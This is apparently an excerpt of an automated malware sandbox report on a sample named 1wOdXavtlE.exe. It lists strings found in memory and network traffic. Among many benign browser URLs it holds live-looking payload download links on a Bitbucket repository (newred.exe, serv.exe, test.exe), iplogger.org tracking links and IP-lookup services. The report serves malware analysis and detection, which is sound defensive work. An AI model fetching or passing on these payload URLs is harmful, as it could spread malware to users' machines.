Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: servs.exe, 00000011.00000003.438656448.00000000024A0000.00000004.00000001.sdmp, servs.tmp, servs.tmp, 00000013.00000000.443300076.0000000000401000.00000020.00020000.sdmp, pass.exe, 00000018.00000003.463502157.000000007FC40000.00000004.00000001.sdmp, pass.tmp, 0000001A.00000000.466868990.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: servs.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: servs.exe, 00000011.00000002.542433050.0000000000401000.00000020.00020000.sdmp, pass.exe, 00000018.00000000.459756419.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: servs.exe, 00000011.00000003.438656448.00000000024A0000.00000004.00000001.sdmp, servs.tmp, pass.exe, 00000018.00000003.463502157.000000007FC40000.00000004.00000001.sdmp, pass.tmp, 0000001A.00000000.466868990.0000000000401000.00000020.00020000.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000000.00000002.361093734.0000000005800000.00000002.00000001.sdmp, ssevs.exe, 00000016.00000002.508683459.00000000061F0000.00000002.00000001.sdmp, sssevs.exe, 00000019.00000002.518884191.0000000006530000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: 1wOdXavtlE.exe, 00000002.00000002.532000749.0000000008233000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb/geoipAppData
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ip.sb4
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/62ab596d-a885-
Source: 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/9580842f-6891-
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485408204.0000000002CE9000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/a1867a39-2dbe-
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/newred.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/serv.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/mminminminmin05/testtest/downloads/test.exe
Source: 1wOdXavtlE.exe, 00000002.00000002.486504849.0000000002E4E000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.orgD8
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.485534638.0000000002D29000.00000004.00000001.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://get.adob
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://helpx.ad
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy
Source: svchost.exe, 0000000F.00000003.439186439.00000221A3B95000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: 1wOdXavtlE.exe, 00000002.00000002.476078937.0000000000402000.00000040.00000001.sdmp, sssevs.exe, 00000019.00000002.498675176.0000000004529000.00000004.00000001.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 1wOdXavtlE.exe, 00000002.00000002.485462160.0000000002CF9000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.org/1tMzh7
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg72
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7:
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tncg7r
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg7
Source: 1wOdXavtlE.exe, 00000002.00000002.483173141.0000000001111000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg78
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	String found in binary or memory: https://iplogger.org/1tsTg7Z
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 1wOdXavtlE.exe, 00000002.00000002.500485146.000000000443C000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 1wOdXavtlE.exe, 00000002.00000002.487142544.0000000002EAE000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.490169443.0000000003080000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 1wOdXavtlE.exe, 00000002.00000002.484483214.0000000002C30000.00000004.00000001.sdmp, 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: 1wOdXavtlE.exe, 00000002.00000002.483762527.0000000002BC1000.00000004.00000001.sdmp	String found in binary or memory: https://wtfismyip.com/text
Source: 1wOdXavtlE.exe, 00000002.00000003.399986812.0000000001111000.00000004.00000001.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000F.00000003.448897541.00000221A3B7C000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.448884292.00000221A3B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.141.204:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.179.59:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.6:49733 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

